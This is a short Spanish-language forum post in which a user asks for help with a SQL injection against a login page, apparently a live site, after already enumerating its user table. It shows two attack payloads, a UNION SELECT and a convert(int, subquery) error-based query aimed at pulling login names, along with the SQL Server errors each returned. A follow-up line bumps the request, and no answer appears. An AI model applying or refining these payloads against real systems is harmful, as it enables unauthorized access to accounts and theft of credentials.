Sql injection problema :(

[locot3]

Buenas y gracias X la ayuda, mi probema es este : en una injecion SQL a una pagina de LOGIN que estoy provando despues de llegar a averiguar el NOMBRE de la TABLA y TODOS sus campos al momento de hacer el :

UNION SELECT MIN(login),1,1,1 FROM tablelogin WHERE login > 'a'--

*REsultado :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Operand type clash: text is incompatible with int

****AL buscar una solucion me encontre con este tipo de injjecion :

convert(int,(SELECT login FROM tablelogin WHERE login > 'a'))

*REsultado :

Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression


por lo que puedo ver el server correo IIS 6.0 si sirve de algo ,, cualquiero ayuda sera bien recivida y muchas gracias por el tiempo !

[locot3]

y los dias pasan ....... .. . ... ..  .....